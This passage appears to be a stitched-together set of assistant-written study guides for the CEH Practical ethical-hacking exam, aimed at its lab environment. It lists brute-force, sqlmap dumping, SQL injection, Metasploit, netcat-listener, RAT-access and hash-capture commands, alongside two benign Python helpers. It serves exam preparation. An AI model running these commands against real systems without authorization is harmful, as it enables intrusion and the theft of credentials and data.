   - Logic: ensure you select the correct BSSID when prompted.
6. Decrypt a VeraCrypt volume. VeraCrypt is usually handled via the GUI in the CEH lab environment.
   - Open VeraCrypt, click Select File and point to the volume, click Mount, then enter the password (found previously via cracking or notes).
   - If you need to crack it: `hashcat -m 13700 volume_hash.txt wordlist.txt`
7. Connect via RDP.
   - Linux: `xfreerdp /u:<user> /p:<password> /v:<IP>`
   - Windows GUI: open Remote Desktop Connection (mstsc), enter the IP, then the credentials.
8. Discover a RAT and recover secret.txt.
   - Identify the RAT: check for unusual open ports (e.g. 4444, 5555, 8080) using `netstat -ano` on the infected machine.
   - Access: if the RAT is a listener, use Netcat to connect: `nc -nv <IP> <port>`
   - Recover: once in, navigate to the user's Desktop or Documents: `type secret.txt` (Windows) or `cat secret.txt` (Linux).
9. Find a password using SMB.
   - Enumeration: `nmap --script smb-brute <IP>`
   - Manual crack: `hydra -L users.txt -P passwords.txt smb://<IP>`
10. Count Mercury services. Mercury is often associated with mail servers.
    - Command: `nmap -sV <IP>`
    - Logic: count the number of ports showing "Mercury" in the version/service column (typically ports 25, 110, 143).
11. Find a CVE number. Once you have a service version (e.g. "Apache 2.4.49"):
    - Command: `searchsploit Apache 2.4.49`
    - Alternative: search the NVD database online for that specific version.
12. Extract plaintext credentials from a PCAP.
    - Open the file in Wireshark and filter by protocol: `http`, `ftp` or `telnet`.
    - Right-click a packet -> Follow -> TCP Stream.
    - Look for "USER" and "PASS" or "Authorization" headers.
13. Extract info from an Android SD card. In the lab this usually involves ADB (Android Debug Bridge).
    - List files: `adb shell ls /sdcard/`
    - Download a folder: `adb pull /sdcard/<folder>`
    - Forensics: use Autopsy to ingest the .img or .ab file if provided.

Since you are heading into your CEH Practical exam, you need to think in terms of tools and workflows. Here is the definitive guide on how to solve these categories of questions step-by-step.

---

1. Network Scanning & OS Detection. Goal: identify the OS and services running on a specific IP.
   - Step 1: use Nmap for comprehensive detection: `nmap -sV -O -Pn <IP>`
   - Step 2: to find specific ports (like RDP or MSSQL) across a range:
     - RDP: `nmap -sV -p 3389 <range>`
     - MSSQL: `nmap -sV -p 1433 <range>`
   - Step 3: use ping to guess the OS via TTL: `ping <IP>`; TTL 64: Linux, TTL 128: Windows.
2. Password Cracking (FTP, SMB, SSH). Goal: gain access to a service using a known username and a wordlist.
   - Step 1: use Hydra: `hydra -l <user> -P /home/attacker/wordlist.txt ftp://<IP>` (or smb, ssh).
   - Step 2: using Metasploit (auxiliary modules): `msfconsole` -> `use auxiliary/scanner/ftp/ftp_login`, `set RHOSTS <IP>`, `set USERNAME <user>`, `set PASS_FILE /path/to/wordlist.txt`, `run`
3. Web & WordPress Exploitation. Goal: enumerate users, plugins and passwords for WordPress sites.
   - Step 1 (users and plugins): `wpscan --url http://<IP>/wordpress -e u,p` (u = users, p = plugins).
   - Step 2 (brute force): `wpscan --url http://<IP>/wordpress -U <user> -P /path/to/wordlist.txt`
   - Step 3 (SQL injection):
     - Find the database name: `sqlmap -u "http://target.com/id=1" --dbs`
     - Find tables: `sqlmap -u "http://target.com/id=1" -D <db> --tables`
     - Dump data: `sqlmap -u "http://target.com/id=1" -D <db> -T <table> --dump`
4. Wireshark & PCAP Analysis. Goal: find hidden credentials, attacker IPs or email info.
   - Step 1 (find credentials): filter by `http.request.method == "POST"` and look at the "Form item" in the details pane.
   - Step 2 (find email/IP): filter by `smtp`, `pop` or `imap` and follow the TCP stream to see the "From" and "To" addresses.
   - Step 3 (find the DoS attacker): go to Statistics -> Conversations -> IPv4 and sort by Packets; the IP with the highest count is the attacker.
5. Cryptography & Steganography. Goal: extract hidden messages or crack file hashes.
   - Step 1 (Steghide): to extract from a .jpg or .wav: `steghide extract -sf <file>`
   - Step 2 (hashes): identify the hash type with `hash-identifier` (paste the hash).
   - Step 3 (crack the hash): use John the Ripper or Hashcat: `john --format=Raw-MD5 --wordlist=/path/to/list.txt hash.txt`
   - Step 4 (integrity): compare MD5 hashes to see if a file was modified: `md5sum <file>` (if the strings differ, it is modified).
6. Windows GUI Tools (crucial for CEH). If the Linux terminal fails, go to the Windows VM and use these:
   - Steganography: OpenStego or Stegalyzer.
   - Encryption: VeraCrypt (to mount volumes) or BCTextEncoder.
   - Remote access: AnyDesk or Remote Desktop Connection.
   - RATs: TheFatRat (Linux) or QuasarRAT (Windows).

---

Quick reference table for default ports:

| Service | Port |
| --- | --- |
| FTP | 21 |
| SSH | 22 |
| DNS | 53 |
| HTTP | 80 / 8080 |
| SMB | 445 |
| MSSQL | 1433 |
| RDP | 3389 |
Since your CEH Practical exam is tomorrow, May 3rd, I have synthesized all your provided questions into a streamlined, step-by-step master guide. These are the exact workflows you will need for the various scenarios you've shared.
________________________________________
1. Network Discovery & OS Detection
Goal: Identify machines, open ports, and operating systems.
• Step 1: Run an aggressive scan on the network range to see what is alive.
  o nmap -sV -O -Pn <target-range>
• Step 2 (Identify RDP/MSSQL): Filter specifically for common high-value ports.
  o RDP (Port 3389): nmap -sV -p 3389 <target>
  o MSSQL (Port 1433): nmap -sV -p 1433 <target>
  o MySQL (Port 3306): nmap -sV -p 3306 <target>
• Step 3 (OS via TTL): If Nmap is blocked, ping the target.
  o TTL 128: Windows machine.
  o TTL 64: Linux machine.
2. Web & WordPress Exploitation
Goal: Find users, vulnerabilities, and database content.
• Step 1 (WordPress Enumeration): Find users like "Raj" and active plugins.
  o wpscan --url http://<IP>/wordpress -e u,p
• Step 2 (WordPress Brute Force): Crack the identified user's password.
  o wpscan --url http://<IP>/wordpress -U Raj -P /home/attacker/Desktop/wordlist.txt
• Step 3 (SQL Injection via SQLmap):
  o List Databases: sqlmap -u "http://target.com/id=1" --dbs
  o List Tables: sqlmap -u "http://target.com/id=1" -D <db_name> --tables
  o Dump Data (Find Phone Numbers/Emails): sqlmap -u "http://target.com/id=1" -D <db_name> -T <table_name> --dump
3. Password Cracking (Hydra & Hashcat)
Goal: Crack FTP, SSH, SMB, or file hashes.
• Step 1 (Hydra for Services):
  o hydra -l <user> -P /path/to/wordlist.txt <target> ftp (or smb, ssh).
• Step 2 (Identify Hashes): Use hash-identifier to determine the algorithm (MD5, SHA-1, etc.).
• Step 3 (Crack Hashes):
  o John: john --wordlist=rockyou.txt hash.txt
  o Hashcat: hashcat -m 0 hash.txt rockyou.txt (where -m 0 is MD5).
4. Traffic Analysis (Wireshark PCAP)
Goal: Recover passwords, identify DoS attackers, and extract files.
• Step 1 (Plaintext Credentials): Filter for http.request.method == "POST" or ftp.
• Step 2 (DoS/DDoS Attacker Identification):
  o Go to Statistics -> Conversations -> IPv4.
  o Sort by Packets. The IP with a massive number of packets is the attacker.
• Step 3 (Analyze Email): Filter for smtp and right-click -> Follow TCP Stream to find sender/recipient IPs.
5. Steganography & Forensics
Goal: Extract hidden data and check file integrity.
• Step 1 (Steghide): For .jpg or .wav files.
  o steghide extract -sf secret.jpg
• Step 2 (Integrity Check): Compare hashes to see if a file was tampered with.
  o md5sum <file>
  o Compare the output to the hashes in the provided /hashes folder.
• Step 3 (VeraCrypt): If you find a .vc or volume file, use the VeraCrypt GUI to mount it using a recovered password.
6. Mobile & Android (ADB)
Goal: Extract info from the device.
• Step 1: Connect: adb connect <IP>
• Step 2: List files: adb shell ls -R /sdcard/
• Step 3: Pull data: adb pull /sdcard/TargetFile.txt .
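The OS-via-TTL rule from section 1, Step 3 above, as an added Python example (not code from the cheatsheet): it reads the TTL out of ping reply lines and maps it to the nearest default initial TTL, so a reply that has crossed a few routers is still classified and the hop count is estimated. The default initial TTL values and the sample ping lines are assumptions and constructed data.

```python
# Added example, not from the cheatsheet: the "TTL 128 = Windows, TTL 64 = Linux"
# rule, extended to account for the hops a reply crossed. Every router on the
# path decrements TTL by one, so a Windows host 11 hops away answers with 117.
# Assumed default initial TTLs (usual values, not from the page): 64 Linux/Unix,
# 128 Windows, 255 most network devices.
import re
from typing import Optional, Tuple

INITIAL_TTLS = {64: "Linux/Unix", 128: "Windows", 255: "Network device / other Unix"}
# Matches the TTL field in Linux ("ttl=64") and Windows ("TTL=128") ping output.
PING_TTL = re.compile(r"\bttl=(\d+)", re.IGNORECASE)


def classify_ttl(observed: int) -> Tuple[str, int]:
    """Return (os_family, estimated_hops) for an observed reply TTL.

    Picks the smallest default initial TTL >= the observed value; the gap is
    the hop count. Valid while paths are shorter than 64 hops, which is true
    of any lab or enterprise network.
    """
    if not 1 <= observed <= 255:
        raise ValueError(f"TTL out of range: {observed}")
    for initial in sorted(INITIAL_TTLS):
        if observed <= initial:
            return INITIAL_TTLS[initial], initial - observed
    raise AssertionError("unreachable: 255 covers every valid TTL")


def ttl_from_ping_line(line: str) -> Optional[int]:
    """Extract the TTL from one ping reply line, or None for a timeout line."""
    match = PING_TTL.search(line)
    return int(match.group(1)) if match else None


if __name__ == "__main__":
    # Constructed sample ping replies, not real output.
    samples = [
        "64 bytes from 10.10.10.5: icmp_seq=1 ttl=128 time=0.42 ms",
        "64 bytes from 10.10.10.7: icmp_seq=1 ttl=61 time=12.8 ms",
        "Reply from 10.10.10.9: bytes=32 time=3ms TTL=117",
        "Request timeout for icmp_seq 1",
    ]
    for line in samples:
        ttl = ttl_from_ping_line(line)
        if ttl is None:
            print("no reply:", line)
            continue
        family, hops = classify_ttl(ttl)
        print(f"ttl={ttl:>3} -> {family} (about {hops} hops away)")
```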
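The Statistics -> Conversations -> IPv4 step from section 4 above, as an added Python example (not code from the cheatsheet): the same per-conversation and per-source packet counts computed over a constructed "src dst" packet list, with a threshold for a single dominant sender. The sample addresses, the packet counts and the 50% share threshold are assumptions.

```python
# Added example, not from the cheatsheet: the per-host packet counts behind
# Wireshark's Statistics -> Conversations -> IPv4 view, computed from a plain
# "src dst" packet list (the shape `tshark -T fields -e ip.src -e ip.dst`
# prints), so the "sort by Packets" step can be scripted and thresholded.
from collections import Counter
from typing import List, Optional, Tuple

# Constructed sample: one host hammering 10.0.0.20 plus ordinary request/reply
# traffic from two other clients. Not real capture data.
SAMPLE_PACKETS = "\n".join(
    ["10.0.0.5 10.0.0.20"] * 40
    + ["10.0.0.8 10.0.0.20", "10.0.0.20 10.0.0.8"] * 3
    + ["10.0.0.9 10.0.0.20", "10.0.0.20 10.0.0.9"]
)


def parse_packets(text: str) -> List[Tuple[str, str]]:
    """Parse one 'src dst' pair per line, skipping blank or malformed lines."""
    pairs = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 2:
            pairs.append((fields[0], fields[1]))
    return pairs


def conversations(pairs: List[Tuple[str, str]]) -> Counter:
    """Packets per IPv4 conversation, direction-agnostic like Wireshark's tab."""
    return Counter(tuple(sorted(p)) for p in pairs)


def packets_by_source(pairs: List[Tuple[str, str]]) -> Counter:
    """Packets sent per source address (the column to sort by)."""
    return Counter(src for src, _ in pairs)


def suspected_flooder(pairs: List[Tuple[str, str]], share: float = 0.5) -> Optional[Tuple[str, int]]:
    """Top sender as (ip, packets) if it alone sent more than `share` of all
    packets, else None. A flood spread over many sources (DDoS) will not trip
    this check; there, look at packets per destination instead."""
    by_src = packets_by_source(pairs)
    if not by_src:
        return None
    src, count = by_src.most_common(1)[0]
    return (src, count) if count > share * len(pairs) else None


if __name__ == "__main__":
    pkts = parse_packets(SAMPLE_PACKETS)
    for (a, b), n in conversations(pkts).most_common():
        print(f"{a:<10} <-> {b:<10} {n:>4} packets")
    print("suspected flooder:", suspected_flooder(pkts))
```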
1. Basic Detection (Finding Databases)
Start by identifying if the URL is vulnerable and listing the available databases.
• Command: sqlmap -u "http://target.com/page.php?id=1" --dbs
• Purpose: The --dbs flag enumerates all databases on the server.
2. Enumerating Tables
Once you have the database name (e.g., user_data), find the tables within it.
• Command: sqlmap -u "http://target.com/page.php?id=1" -D user_data --tables
• Purpose: The -D flag specifies the database, and --tables lists all tables inside it.
3. Enumerating Columns
If you need to find specific fields like "Phone Number" or "Password," list the columns of a specific table (e.g., employees).
• Command: sqlmap -u "http://target.com/page.php?id=1" -D user_data -T employees --columns
• Purpose: The -T flag specifies the table, and --columns shows the structure (e.g., name, phone, email).
4. Dumping Data (Getting the Answer)
This is the final step to "find contact details" or "extract information".
• Command: sqlmap -u "http://target.com/page.php?id=1" -D user_data -T employees --dump
• Purpose: The --dump flag extracts all records from the specified table and displays them in the terminal.
5. Advanced Flags for the Exam
• Automate Inputs: Add --batch to automatically choose "Yes" for all prompts (saves time).
• Specify Parameter: If there are multiple parameters, use -p (e.g., -p id) to tell sqlmap exactly which one to test.
• Increase Risk/Level: If detection fails, use --level=3 --risk=3 to perform more aggressive testing.
Summary Workflow
1. Find DBs: --dbs
2. Find Tables: -D <db_name> --tables
3. Dump Data: -D <db_name> -T <table_name> --dump
________________________________________
1. Identify the Database Name
Start by checking if the URL is vulnerable and listing the databases.
• Command: sqlmap -u "http://target.com/page.php?id=1" --dbs --batch
• Action: Look for a database that isn't information_schema or mysql (e.g., CEH_DB).
2. List Tables in the Database
Once you have the database name, find the tables where the sensitive info is hidden.
• Command: sqlmap -u "http://target.com/page.php?id=1" -D CEH_DB --tables --batch
• Action: Identify tables that look promising, such as users, employees, or contacts.
3. List Columns in a Specific Table
If the question asks for a specific piece of data (like a "Phone Number"), check the column names first.
• Command: sqlmap -u "http://target.com/page.php?id=1" -D CEH_DB -T users --columns --batch
• Action: This confirms if columns like username, password, or phone exist.
4. Dump the Target Data
This is the command that gives you the final answer for your exam flag.
• Command: sqlmap -u "http://target.com/page.php?id=1" -D CEH_DB -T users --dump --batch
• Action: sqlmap will extract everything from that table and display it in a neat grid for you to read.
________________________________________
Pro-Tips for the Exam
• Handling Multiple Parameters: If the URL has multiple parts (e.g., id=1&type=admin), use -p to tell sqlmap exactly which one to test:
  o sqlmap -u "http://target.com/page.php?id=1&type=admin" -p id --dbs --batch
• Aggressive Testing: If the basic command doesn't work, increase the level of testing:
  o sqlmap -u "http://target.com/page.php?id=1" --dbs --level=3 --risk=3 --batch
• Finding the URL: In the CEH lab, you usually find the vulnerable URL by first running an nmap scan or using a tool like dirb or gobuster to find hidden pages.
0. UNIVERSAL FIRST STEP (ALWAYS DO THIS)
nmap -sC -sV -oN scan.txt <IP>
👉 This gives:
• Ports
• Services
• Versions
• Default scripts output
⚠️ 80% of answers start from here.
________________________________________
🔍 1. FULL PORT SCAN (if needed)
nmap -p- <IP>
nmap -p- --min-rate 1000 <IP>
👉 Use when:
• Nothing useful found in normal scan
________________________________________
📂 2. SMB ENUMERATION (VERY COMMON)
smbclient -L //<IP>
smbclient //<IP>/share
enum4linux <IP>
👉 Look for:
• Shares
• Usernames
• Anonymous login
________________________________________
🌐 3. WEB ENUMERATION (MOST SCORING AREA)
Directory Bruteforce
gobuster dir -u http://<IP> -w /usr/share/wordlists/dirb/common.txt
Alternative:
dirb http://<IP>
👉 Check:
• /admin
• /backup
• /login
• /uploads
________________________________________
View Source (VERY IMPORTANT)
• Right click → View Page Source
• Look for:
  o hidden comments
  o credentials
________________________________________
💣 4. METASPLOIT (DON’T OVERCOMPLICATE)
msfconsole
search <service or CVE>
use <exploit module>
set RHOSTS <IP>
set LHOST <your IP>
run
After exploit:
sessions
sessions -i 1
________________________________________
🐚 5. SHELL BASICS (YOU WILL NEED THIS)
whoami
hostname
pwd
ls
cat file.txt
👉 Many answers = inside files
________________________________________
🔑 6. PASSWORD ATTACKS
Hydra (login brute force)
hydra -l admin -P pass.txt <IP> ssh
John (hash cracking)
john hash.txt
john --show hash.txt
________________________________________
📡 7. NETCAT (VERY USEFUL)
Connect: nc <IP> <port>
Listener: nc -lvnp 4444
________________________________________
📁 8. FILE TRANSFER
wget http://<IP>/file
curl -O http://<IP>/file
________________________________________
🧠 9. RESPONDER (HASH CAPTURE)
responder -I eth0
👉 Answer often = username or hash
________________________________________
🌐 10. SQL INJECTION (BASIC)
Try in URL: ' OR 1=1 --
👉 Or use:
sqlmap -u "http://<IP>/page?id=1" --dbs
________________________________________
📦 11. FTP
ftp <IP>
Try:
• anonymous login
________________________________________
🧾 12. SEARCH INSIDE SYSTEM
find / -name "flag.txt" 2>/dev/null